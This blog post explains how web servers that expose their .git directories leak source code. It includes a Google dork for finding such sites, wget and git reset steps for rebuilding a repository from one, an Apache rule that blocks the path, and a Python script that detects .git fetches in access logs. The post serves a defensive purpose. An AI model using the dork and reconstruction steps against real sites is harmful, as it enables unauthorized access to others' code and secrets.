Anand Sudhanaboina

.git Is Dangerous

Git is fantastic, but it can be dangerous. Let’s search for something on Google:

“.git” intitle:“Index of”

This Google dork lists websites that have their .git folders exposed to the web (directory listing enabled on the .git path).


Git is not to be blamed here; the poor server configuration is. This may not sound alarming to novice devs, but with an exposed .git folder the entire source code can be reconstructed. Let’s see how:

  1. Download the entire .git directory using wget: wget -r --no-parent http://example.com/.git
  2. Run git log and copy the most recent commit hash.
  3. Then run the final command: git reset --hard <HASH>, in my case: git reset --hard 674d17771ad65bb73f4c6b96644d69d7ff19351b to restore the files

Server admins should add adequate configuration to protect the .git folder; ideally .git should never be part of the build or deployed to the hosted document root at all. Apache users with mod_rewrite enabled can add the line below to their configuration to deny access to the .git folder (note the escaped dot, so that the rule matches a literal ".git" path component):

RewriteRule ^(.*/)?\.git+ - [R=404,L]
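Beyond blocking the path, an admin should know whether anyone has already fetched .git contents. The following is an added example, not code from the original post: it parses Apache combined-format access log lines (the sample lines are constructed, with the commit hash from this post used for the object path), flags every request that touched a .git path, and reports per source IP how many were actually served (2xx) versus blocked, so a successful fetch of /.git/HEAD or /.git/objects/... stands out as a confirmed exposure rather than a probe.

```python
import re
from collections import Counter

# Constructed sample lines in Apache "combined" log format (not from a real server).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /.git/HEAD HTTP/1.1" 200 23 "-" "curl/8.0"
203.0.113.5 - - [10/Oct/2023:13:55:37 +0000] "GET /.git/config HTTP/1.1" 200 259 "-" "curl/8.0"
203.0.113.5 - - [10/Oct/2023:13:55:38 +0000] "GET /.git/objects/67/4d17771ad65bb73f4c6b96644d69d7ff19351b HTTP/1.1" 200 812 "-" "Wget/1.21"
198.51.100.9 - - [10/Oct/2023:14:01:02 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Oct/2023:14:01:03 +0000] "GET /blog/.git/HEAD HTTP/1.1" 404 196 "-" "Mozilla/5.0"
"""

# Apache combined log format: client, identd, user, [timestamp], "request", status, size, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Any path component named exactly ".git", at the web root or under a sub-directory.
GIT_PATH_RE = re.compile(r'(^|/)\.git(/|$)')


def parse_line(line):
    """Return the log fields as a dict, or None if the line is not in combined format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_git_requests(log_text):
    """Return (ip, path, status) for every request that touched a .git path."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and GIT_PATH_RE.search(rec["path"]):
            hits.append((rec["ip"], rec["path"], int(rec["status"])))
    return hits


def summarize(hits):
    """Per source IP: how many .git requests were served (2xx) vs. blocked (anything else)."""
    served, blocked = Counter(), Counter()
    for ip, _path, status in hits:
        (served if 200 <= status < 300 else blocked)[ip] += 1
    return {ip: {"served": served[ip], "blocked": blocked[ip]} for ip in set(served) | set(blocked)}


if __name__ == "__main__":
    for ip, info in summarize(find_git_requests(SAMPLE_LOG)).items():
        verdict = "EXPOSED (content served)" if info["served"] else "blocked"
        print(f"{ip}: {info['served']} served, {info['blocked']} blocked -> {verdict}")
```

Run it against a real access log by reading the file into `find_git_requests`; any IP with a non-zero "served" count fetched repository content before the rule above was in place.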
